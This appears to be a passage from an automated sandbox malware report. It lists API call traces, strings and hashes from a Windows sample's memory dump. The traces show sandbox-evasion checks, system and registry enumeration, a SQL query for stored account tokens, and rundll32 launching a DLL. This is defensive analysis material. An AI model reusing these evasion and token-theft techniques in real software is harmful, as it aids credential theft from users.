                                                                                                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                              • API String ID: 224852652-4138519520
                                                                                                                                                                                                                              • Opcode ID: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
                                                                                                                                                                                                                              • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                              • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                              • Opcode ID: 0dfaf801bfec00c2bc2ebe50847e2035671af3c91b46ad4f7e3196e360e0a54e
                                                                                                                                                                                                                              • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dfaf801bfec00c2bc2ebe50847e2035671af3c91b46ad4f7e3196e360e0a54e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2910), ref: 00415F11
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D29A0), ref: 00415F2A
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2958), ref: 00415F42
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2940), ref: 00415F5A
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2970), ref: 00415F73
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042EEF30), ref: 00415F8B
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D3F78), ref: 00415FA3
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D41D8), ref: 00415FBC
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F0638), ref: 00415FD4
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F0530), ref: 00415FEC
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F05F0), ref: 00416005
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F05D8), ref: 0041601D
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D3FF8), ref: 00416035
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F03F8), ref: 0041604E
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                              • GetUserDefaultLangID.KERNEL32 ref: 004136E6
                                                                                                                                                                                                                                • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1125299040-0
                                                                                                                                                                                                                              • Opcode ID: c68b81ff4b05b1a0ab45a4ca2bc7cc5aeaafa69d51f1164b6b186f3869907372
                                                                                                                                                                                                                              • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c68b81ff4b05b1a0ab45a4ca2bc7cc5aeaafa69d51f1164b6b186f3869907372
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,042F6B08,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,042F68C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                              • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                              • Opcode ID: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
                                                                                                                                                                                                                              • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,042F7660,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,042F83B0,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8410), ref: 00411E2B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                              • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                              • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                              • String ID: X@
                                                                                                                                                                                                                              • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                              • Opcode ID: bd2aad392ddce8e509498b497cec8cbdfa1914d96ed247c75ddc5ef3103a8c15
                                                                                                                                                                                                                              • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd2aad392ddce8e509498b497cec8cbdfa1914d96ed247c75ddc5ef3103a8c15
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                                                                                              • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                                                                                              • API String ID: 672783590-3078973353
                                                                                                                                                                                                                              • Opcode ID: 258d4ebfc66ed96dd19087c235080dee1f5f1bf45f7a0d4999c098e0e1a92ace
                                                                                                                                                                                                                              • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 258d4ebfc66ed96dd19087c235080dee1f5f1bf45f7a0d4999c098e0e1a92ace
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6CE8), ref: 0041244B
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042EF930), ref: 004124B7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F7580), ref: 004124DF
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                                                                                                              • Opcode ID: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
                                                                                                                                                                                                                              • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
